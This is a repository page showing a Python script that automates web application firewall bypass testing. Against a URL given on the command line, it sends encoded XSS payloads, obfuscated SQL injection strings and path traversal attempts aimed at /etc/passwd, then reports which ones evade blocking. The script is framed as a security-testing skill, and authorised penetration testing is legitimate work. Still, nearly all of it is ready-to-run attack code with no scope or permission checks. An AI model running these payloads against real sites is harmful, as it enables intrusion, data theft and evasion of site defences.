creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-11 21:54:56 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
757f1c8eae4e288d20f7dfde7f7a42a4d30cffc7
Anthropic-Cybersecurity-Skills/skills/performing-web-application-firewall-bypass/scripts/agent.py
T
mukul975 27c6414ca5 Add folder anatomy (scripts/agent.py + references/api-reference.md) for 648 cybersecurity skills 
Complete skill folder anatomy across all cybersecurity skills:
- scripts/agent.py: 80-150 line Python agents using real libraries (impacket,
  boto3, azure-mgmt-*, kubernetes, pefile, yara, scapy, shodan, stix2, etc.)
- references/api-reference.md: real API documentation with method signatures
- LICENSE: MIT license for all skill folders
2026-03-10 21:02:12 +01:00

145 lines
6.0 KiB
Python
Raw Blame History

#!/usr/bin/env python3
"""Agent for testing WAF bypass techniques.
Sends encoded, obfuscated, and protocol-level bypass payloads
against a target URL to identify WAF evasion weaknesses in
XSS, SQLi, and path traversal filtering.
"""
import requests
import json
import sys
import urllib.parse
from datetime import datetime
class WAFBypassAgent:
"""Tests web application firewall bypass techniques."""
def __init__(self, target_url):
self.target_url = target_url
self.session = requests.Session()
self.findings = []
def _send(self, payload, param="q", method="GET", headers=None):
try:
if method == "GET":
resp = self.session.get(
self.target_url, params={param: payload},
headers=headers or {}, timeout=10, allow_redirects=False)
else:
resp = self.session.post(
self.target_url, data={param: payload},
headers=headers or {}, timeout=10, allow_redirects=False)
return {"status": resp.status_code, "length": len(resp.text),
"blocked": resp.status_code in (403, 406, 429, 501)}
except requests.RequestException as exc:
return {"error": str(exc)}
def test_encoding_bypasses(self, base_payload="<script>alert(1)</script>"):
"""Test URL encoding, double encoding, and Unicode bypasses."""
encodings = {
"plain": base_payload,
"url_encoded": urllib.parse.quote(base_payload),
"double_encoded": urllib.parse.quote(urllib.parse.quote(base_payload)),
"hex_entities": "".join(f"&#x{ord(c):02x};" for c in base_payload),
"unicode_fullwidth": base_payload.replace("<", "\uff1c").replace(">", "\uff1e"),
"null_byte": base_payload[:7] + "%00" + base_payload[7:],
"tab_insert": base_payload.replace("script", "scr\tipt"),
"newline_insert": base_payload.replace("script", "scr\nipt"),
}
results = []
for name, payload in encodings.items():
resp = self._send(payload)
bypassed = not resp.get("blocked", True) and not resp.get("error")
if bypassed:
self.findings.append({"type": "Encoding Bypass", "technique": name,
"severity": "High"})
results.append({"technique": name, "blocked": resp.get("blocked"),
"status": resp.get("status")})
return results
def test_sqli_bypasses(self):
"""Test SQL injection WAF bypass techniques."""
payloads = {
"inline_comment": "1'/**/OR/**/1=1--",
"version_comment": "1'/*!50000OR*/1=1--",
"case_variation": "1' oR 1=1--",
"concat_function": "1' OR CONCAT(0x31)=1--",
"hex_encoding": "1' OR 0x313d31--",
"scientific_notation": "1' OR 1e0=1e0--",
"buffer_overflow": "1' OR " + "A" * 5000 + " 1=1--",
"json_content_type": "1' OR '1'='1",
}
results = []
for name, payload in payloads.items():
headers = {"Content-Type": "application/json"} if name == "json_content_type" else {}
resp = self._send(payload, method="POST", headers=headers)
bypassed = not resp.get("blocked", True) and not resp.get("error")
if bypassed:
self.findings.append({"type": "SQLi WAF Bypass", "technique": name,
"severity": "Critical"})
results.append({"technique": name, "blocked": resp.get("blocked"),
"status": resp.get("status")})
return results
def test_path_traversal_bypasses(self):
"""Test path traversal WAF evasion."""
payloads = {
"dot_dot_slash": "../../../etc/passwd",
"encoded_dots": "..%2f..%2f..%2fetc%2fpasswd",
"double_encoded": "..%252f..%252f..%252fetc%252fpasswd",
"utf8_encoding": "..%c0%af..%c0%afetc/passwd",
"backslash": "..\\..\\..\\etc\\passwd",
"null_byte_ext": "../../../etc/passwd%00.png",
}
results = []
for name, payload in payloads.items():
resp = self._send(payload, param="file")
bypassed = not resp.get("blocked", True) and not resp.get("error")
if bypassed:
self.findings.append({"type": "Path Traversal Bypass",
"technique": name, "severity": "High"})
results.append({"technique": name, "blocked": resp.get("blocked"),
"status": resp.get("status")})
return results
def test_http_method_bypass(self):
"""Test if WAF only inspects certain HTTP methods."""
methods = ["GET", "POST", "PUT", "PATCH", "DELETE", "OPTIONS", "HEAD"]
payload = "<script>alert(1)</script>"
results = []
for method in methods:
try:
resp = self.session.request(method, self.target_url,
params={"q": payload}, timeout=10)
results.append({"method": method, "status": resp.status_code,
"blocked": resp.status_code in (403, 406, 429)})
except requests.RequestException:
results.append({"method": method, "error": "failed"})
return results
def generate_report(self):
report = {
"target": self.target_url,
"report_date": datetime.utcnow().isoformat(),
"total_bypasses": len(self.findings),
"findings": self.findings,
}
print(json.dumps(report, indent=2))
return report
def main():
url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8080/"
agent = WAFBypassAgent(url)
agent.test_encoding_bypasses()
agent.test_sqli_bypasses()
agent.test_path_traversal_bypasses()
agent.test_http_method_bypass()
agent.generate_report()
if __name__ == "__main__":
main()
Reference in New Issue View Git Blame Copy Permalink